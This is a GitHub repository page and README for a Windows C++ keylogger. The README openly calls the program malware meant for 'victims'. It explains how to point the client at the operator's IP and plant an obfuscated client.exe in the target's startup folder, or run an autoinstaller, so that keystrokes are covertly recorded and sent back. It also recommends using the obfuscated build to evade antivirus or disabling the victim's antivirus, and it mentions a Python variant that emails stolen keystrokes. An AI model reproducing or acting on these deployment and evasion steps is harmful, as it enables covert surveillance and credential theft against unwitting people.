Skip to content

sam-astro/CPP-Key-Logger

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

45 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Key-Logger For Windows

Local network program that logs keystrokes. It stores all key presses and clicks in a text document, and when the host becomes active it will send that data to them.

IMPORTANT: If you try to run this, it could possibly be detected by your antivirus. Make sure to use the obfuscated version for actual victims, or create an exception or turn of their antivirus if you decide to run it, or it may be deleted.


In Development

This project is still in development, and has many flaws which keep it from being as good as it could be. I am currently working on a version which allows WAN connectivity, which shouldn't be too difficult once I do some research. I also want to allow for a completely invisible client (the actual "logger"). Although this can be enabled if you like by uncommenting a line of code in net.cpp then recompiling, it doen't work all of the time and I haven't even tested it for a while.

Getting Detected by Antivirus

I want to make a version or integrate a way to make it unrecognizable by any antivirus software. I recently made an obfuscated version (in the obfuscated folder) which actually passes on VirusTotal, although sooner or later it will get blacklisted and things will have to be changed again. I reccommend learning how to obfuscate code on your own, or you can use a workaround like making an exception for the CPP-Key-Logger folder on your system in your antivirus software.

Alternative Logger I Made

To create a keylogger that fully works, I have made the emailer keylogger in python that emails logged keys from anywhere in the world from the victims computer. Although it fully works, it requires the install of python3 on each system it infects which is not ideal since most systems don't have it and it is a large download. That is why I will most likely go back to this c++ project, since all windows machines can run it and builds (.exe's) all seem to work fine.

Setup

Setup is fairly straightforward. First, edit both the client/net.cpp and the host/host.cpp files so that the ip address, which is currently 192.168.56.1, is instead your pcs ip. After that, once on the target computer move the keylogger at Client/Keylogger-Obfuscated/client.exe to the startup folder or run Extra/autoinstall.exe, and that is it. Now, the next time their system boots up the keylogger will sneakily record their typing in the background, and whenever you run Host/host.exe on your own computer the results will be sent to you.

Important Files

  • Client/ - Contains build and source for the obfuscated and showing version of client (the malware)
  • Host/ - Contains build and source for the Host, which is how you manage the malware from your own computer
  • Extra/ - Contains build and source for the installer, which runs a simple shell script that adds the virus (the obfuscated version) to the startmenu, which means the malware will start the next time the victim restarts their computer

Releases

No releases published

Packages

No packages published